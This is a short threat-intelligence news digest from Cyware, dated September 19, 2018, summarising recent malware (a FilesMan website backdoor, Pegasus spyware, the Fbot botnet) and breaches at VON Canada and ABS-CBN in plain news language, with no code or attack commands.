Cyware Daily Threat Intelligence September 19, 2018

Top Malware Reported in the Last 24 Hours

Website backdoor
A new website backdoor has been discovered that loads from an online clipboard service instead of embedding its code in a webpage like other backdoors. A code downloads the backdoor which then gets a hold of the malware designed to allow the website attacker to reinfect the website at a later date.  Once decrypted, the contents of the downloaded malicious payload reveal that the backdoor is the FilesMan malware which enables threat actors to gain access, modify and reinfect websites at any time post-infection.

Pegasus
The NSO Group's Pegasus spyware has been deployed against victims in 45 countries. The malware can operate on both Android and iOS devices and can record conversations, steal private messages, and exfiltrate photos.  At least 10 operators of Pegasus have deployed the malware outside their country’s border. 

Fbot
Fbot is a new Mirai botnet variant, which instead of conducting DDoS attacks against systems, hunts for systems infected by cryptominers and removes the mining malware.  After the botnet has tracked down ADB malware processes, killed them, and scrubbed away any trace of the former infection, the botnet deletes itself.

Top Breaches Reported in the Last 24 Hours

VON Canada attack
VON Canada was hit by a ransomware attack. The nursing firm discovered the attack on September 1 and immediately shut down all its systems to stem the damage the attack could have caused. VON's phone and email systems were included in the shutdown, which led to some delays and missed appointments. VON has approximately 13,000 clients in Nova Scotia, where it has returned to normal operations. 

ABS-CBN hacked
The Philippines-based media giant ABS-CBN’s online store was hacked. The cybercriminals behind the attack used a payment skimming malware to collect the financial data of customers attempting to buy merchandise from the online store. The malware sent the data to a payment collection server registered in Irkutsk, Russia. The mode of attack is browser-based interception during the checkout process, which is the same attack method used to hack British Airways recently. The fingers are pointing to a group called Magecart, implicated in the British Airways breach.




  • Share this blog:
To enhance your experience on our website, we use cookies to help us understand how you interact with our website. By continuing navigating through Cyware’s website and its products, you are accepting the placement and use of cookies. You can also choose to disable your web browser’s ability to accept cookies and how they are set. For more information, please see our Privacy Policy.